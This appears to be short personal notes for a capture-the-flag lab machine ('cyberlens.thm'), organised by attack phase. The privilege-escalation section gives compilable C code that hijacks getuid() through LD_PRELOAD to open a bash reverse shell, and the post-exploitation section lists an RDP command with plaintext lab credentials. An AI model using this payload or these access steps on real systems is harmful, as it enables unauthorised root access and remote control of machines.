Notes
Reconncenc
If found id_rsa make chmod 600 to access file
Initial Access
Privesc
Here is a library you can compile to abuse the LD_PRELOAD
env variable:
#include <unistd.h>
#include <sys/types.h>
#include <stdio.h>
#include <stdlib.h>
uid_t getuid(void){
unsetenv("LD_PRELOAD");
system("bash -c \"sh -i >& /dev/tcp/127.0.0.1/1234 0>&1\"");
return 1;
}
Post-exploitation
Get-ChildItem -Recurse -File -ErrorAction SilentlyContinue | Select-Object FullName
xfreerdp /v:cyberlens.thm /u:CyberLens /p:HackSmarter123 /size:80% /drive:.,kali-share
Last updated